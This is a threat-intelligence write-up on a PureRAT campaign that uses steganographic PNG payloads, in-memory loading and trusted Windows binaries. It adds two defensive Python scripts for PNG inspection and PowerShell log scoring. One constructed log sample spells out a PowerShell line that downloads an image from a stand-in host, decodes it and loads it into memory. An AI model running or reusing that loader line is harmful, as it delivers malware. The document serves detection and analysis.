A recently identified campaign leveraging PureRAT demonstrates a significant evolution in cyber threats through the combined use of steganography and fileless execution techniques. The attack begins with a deceptive LNK shortcut that triggers an obfuscated PowerShell script, which downloads a seemingly benign PNG image containing a hidden Base64-encoded payload.
This payload is extracted and executed entirely in memory using legitimate Windows utilities such as cmstp.exe and msbuild.exe, allowing the malware to bypass traditional defences and blend into normal system activity. The campaign incorporates advanced techniques, including sandbox detection, process hollowing, and encrypted multi-stage loaders to establish persistent access and enable data theft or further compromise.
The PureRAT campaign follows a multi-stage, fileless infection chain initiated by a malicious LNK file that executes an obfuscated PowerShell command. This script retrieves a PNG image from a remote server, which contains a Base64-encoded payload hidden using steganography.
The script programmatically extracts and transforms the encoded data through character replacement and reversal before decoding it into a byte array. This payload is then reflectively loaded into memory using .NET’s Assembly.Load(), eliminating the need for disk-based artifacts.
The loaded assembly acts as a loader that decrypts subsequent payloads using Triple DES encryption with embedded keys and initialization vectors. Execution continues entirely in memory and incorporates virtualization checks for sandbox evasion, a UAC bypass via cmstp.exe, and process hollowing into msbuild.exe so that the payload runs under the name of a legitimate process.
The final stage establishes command-and-control communication and ensures persistence through scheduled tasks, enabling long-term remote access without leaving conventional file traces. The details of the attack chain are discussed in the sections below.
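One check a defender can run on images that a scripting host fetched is to ask whether the file carries more than a PNG needs. The following Python script is an added example, not code from the original write-up or from the PureRAT analysis: it walks the PNG chunk list, flags bytes after the IEND chunk, chunk types outside the PNG specification and CRC mismatches, and tests whether a trailing blob is Base64 text. The 1x1 image, the appended text and the private chunk are constructed inline so it runs offline. The page does not describe the campaign's carrier layout in detail, so this covers appended-data and extra-chunk carriers, not pixel-level (LSB) embedding.

```python
"""Inspect a PNG for data the image format does not need (added example).

This is not code from the original write-up. It walks the chunk list,
reports bytes after IEND, chunk types outside the PNG specification and
CRC mismatches, and checks whether trailing bytes look like Base64 text.
"""
import base64
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification (critical and ancillary).
KNOWN_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}
BASE64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def parse_chunks(data: bytes):
    """Return (chunks, end_offset); chunks are (type, payload, crc_ok) tuples."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_end = pos + 8 + length
        if body_end + 4 > len(data):
            break  # truncated chunk: stop here and treat the rest as trailing bytes
        payload = data[pos + 8:body_end]
        stored_crc = struct.unpack(">I", data[body_end:body_end + 4])[0]
        chunks.append((ctype, payload, stored_crc == zlib.crc32(ctype + payload)))
        pos = body_end + 4
        if ctype == b"IEND":
            break  # anything after IEND is not part of the image
    return chunks, pos


def looks_like_base64(blob: bytes, min_len: int = 32) -> bool:
    """Heuristic: long, Base64 alphabet only (whitespace ignored) and decodes cleanly."""
    compact = re.sub(rb"\s+", b"", blob)
    if len(compact) < min_len or not BASE64_RE.match(compact):
        return False
    try:
        base64.b64decode(compact, validate=True)
        return True
    except (ValueError, TypeError):  # binascii.Error is a ValueError
        return False


def inspect_png(data: bytes) -> dict:
    """Summarise where a PNG could be carrying non-image data."""
    chunks, end = parse_chunks(data)
    trailing = data[end:]
    unknown = [t.decode("latin-1") for t, _, _ in chunks if t not in KNOWN_CHUNKS]
    bad_crc = [t.decode("latin-1") for t, _, ok in chunks if not ok]
    report = {
        "chunk_types": [t.decode("latin-1") for t, _, _ in chunks],
        "unknown_chunks": unknown,
        "bad_crc": bad_crc,
        "trailing_bytes": len(trailing),
        "trailing_base64": looks_like_base64(trailing),
    }
    report["suspicious"] = bool(trailing) or bool(unknown) or bool(bad_crc)
    return report


def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one chunk: length, type, payload, CRC over type+payload."""
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def build_sample_png() -> bytes:
    """Constructed 1x1 grayscale PNG used only to exercise the checks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grayscale
    idat = zlib.compress(b"\x00\x00")                   # filter byte + one pixel
    return PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")


CLEAN_PNG = build_sample_png()
# Constructed: harmless text appended after IEND stands in for a hidden payload.
APPENDED_PNG = CLEAN_PNG + base64.b64encode(b"constructed filler text standing in for an appended blob")
# Constructed: a private ancillary chunk ("prVt") inserted before the 12-byte IEND chunk.
PRIVATE_CHUNK_PNG = CLEAN_PNG[:-12] + png_chunk(b"prVt", b"constructed private chunk body") + CLEAN_PNG[-12:]

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_PNG), ("appended", APPENDED_PNG), ("private", PRIVATE_CHUNK_PNG)):
        print(name, inspect_png(img))
```

Trailing data after IEND is also left behind by some legitimate editors, so treat a hit as a triage signal to pair with the script block logging that fetched the file, not as a verdict on its own.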
Delivery and Infection Chain:
The attack is initiated through a malicious Windows shortcut file that is typically delivered via phishing or disguised as a legitimate file. Upon execution, the shortcut silently runs a hidden PowerShell command that retrieves a remote payload embedded within an image file.
Technical Capabilities:
PureRAT demonstrates highly advanced fileless execution capabilities designed to evade traditional detection mechanisms. It leverages PowerShell for execution and steganography to conceal malicious payloads within benign image files, which are then decoded and loaded directly into memory.
The malware employs layered obfuscation techniques, encrypted payload stages, and sandbox evasion mechanisms to avoid both static and behavioral analysis. It bypasses User Account Control using legitimate Windows utilities and injects code into trusted processes to maintain stealth.
Once active, PureRAT performs system reconnaissance, establishes persistent communication with command-and-control infrastructure, and enables modular deployment of additional capabilities such as keylogging, remote access, and continuous monitoring.
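The behaviors listed above (PowerShell fetching an image, Base64 decoding, character replacement and reversal, Assembly.Load, and the hand-off to cmstp.exe or msbuild.exe) all surface in PowerShell script block logging when it is enabled. The Python below is an added example, not part of the original write-up: it scores constructed Event ID 4104 ScriptBlockText entries against those indicators and raises an alert either on the full download-decode-load chain or when a weighted score crosses a threshold. The event lines, weights and threshold are assumptions made for the demo, not values taken from the campaign.

```python
"""Score PowerShell script block log entries for the in-memory loader pattern.

Added example, not from the original write-up. The events are constructed
to resemble the ScriptBlockText field of Event ID 4104
(Microsoft-Windows-PowerShell/Operational); none is a real campaign sample.
"""
import re

# Indicator name -> (weight, pattern). Weights and patterns are demo assumptions;
# the regexes are deliberately loose so casing and spacing changes do not defeat them.
INDICATORS = {
    "image_download": (2, re.compile(r"(DownloadData|DownloadString|Invoke-WebRequest|Net\.WebClient)[^\n]*\.png", re.I)),
    "base64_decode": (1, re.compile(r"FromBase64String", re.I)),
    "string_reverse": (2, re.compile(r"\[array\]::Reverse|-join\s*\(?\s*\$\w+\[-1\.\.", re.I)),
    "char_replace": (1, re.compile(r"(\.Replace\([^)]*\)\s*){2,}", re.I)),
    "reflective_load": (3, re.compile(r"(Reflection\.)?Assembly\]::Load\b", re.I)),
    "lolbin": (3, re.compile(r"\b(cmstp|msbuild)\.exe", re.I)),
    "hidden_window": (1, re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass", re.I)),
}
ALERT_THRESHOLD = 4
# The three steps that make up the delivery chain described on this page.
CHAIN = {"image_download", "base64_decode", "reflective_load"}


def score_script_block(text: str) -> dict:
    """Match one script block against the indicators and decide whether to alert."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[h][0] for h in hits)
    chain = CHAIN <= set(hits)
    return {"hits": hits, "score": score, "chain": chain,
            "alert": chain or score >= ALERT_THRESHOLD}


def triage(events):
    """Return (index, result) for every 4104 event whose script block should be raised."""
    raised = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 4104:
            continue
        res = score_script_block(ev.get("ScriptBlockText", ""))
        if res["alert"]:
            raised.append((i, res))
    return raised


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Routine administration: no indicators at all.
    {"EventID": 4104, "ScriptBlockText":
        "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item"},
    # Legitimate Base64 use: one weak indicator, should stay below the threshold.
    {"EventID": 4104, "ScriptBlockText":
        "$cfg = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($env:APP_CFG))"},
    # Modelled on the chain in the write-up: fetch PNG, substitute, reverse, decode, load in memory.
    {"EventID": 4104, "ScriptBlockText":
        "$img=(New-Object Net.WebClient).DownloadData('http://example.invalid/pic.png');"
        "$t=[Text.Encoding]::ASCII.GetString($img);$t=$t.Replace('%','A').Replace('$','B');"
        "$c=$t.ToCharArray();[array]::Reverse($c);"
        "$bytes=[Convert]::FromBase64String(-join $c);[Reflection.Assembly]::Load($bytes)"},
    # Hand-off to a trusted binary from a hidden PowerShell window.
    {"EventID": 4104, "ScriptBlockText":
        "Start-Process -FilePath cmstp.exe -ArgumentList $inf -WindowStyle Hidden"},
]

if __name__ == "__main__":
    for idx, res in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={res['score']} chain={res['chain']} hits={res['hits']}")
```

The chain rule is the lower false-positive signal: FromBase64String alone is common in legitimate administration, as the second sample shows, while download plus decode plus Assembly.Load in one block rarely is. Process creation telemetry (msbuild.exe or cmstp.exe spawned by powershell.exe) covers the later stages that the script block text may not name.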
Attribution and Evolution:
While definitive attribution remains unconfirmed, the techniques observed in this campaign align with modern financially motivated or espionage-driven threat actors. The use of steganography, in-memory execution, and layered obfuscation reflects a broader shift from traditional file-based malware to stealthy, memory-resident threats.
This campaign highlights an ongoing evolution in attacker methodologies focused on evasion, persistence, and reduced forensic visibility.
Active Campaign and Geographic Spread:
The campaign appears opportunistic in nature, leveraging phishing and generic delivery mechanisms to achieve widespread distribution across industries. The use of common file formats and remote infrastructure allows it to scale globally without targeting a specific region.
Dynamic command-and-control mechanisms enable attackers to adapt operations and shift targets as needed, broadening the campaign's reach.
Conclusion:
The PureRAT campaign underscores the growing prevalence of fileless malware that leverages trusted system utilities and benign file formats to evade detection. The combination of steganography, in-memory execution, and multi-stage payload delivery challenges traditional security approaches.
Organizations must move beyond signature-based defenses and adopt behavioral detection, enhanced monitoring of scripting environments, and stricter control over trusted binaries to effectively mitigate such threats.
A successful PureRAT infection provides attackers with persistent remote access to compromised systems, enabling data exfiltration, credential theft, surveillance, and lateral movement within networks.
The fileless nature of the attack complicates detection and forensic investigation, increasing dwell time and amplifying potential damage. This can result in operational disruption, data breaches, financial loss, and reputational impact if not identified early.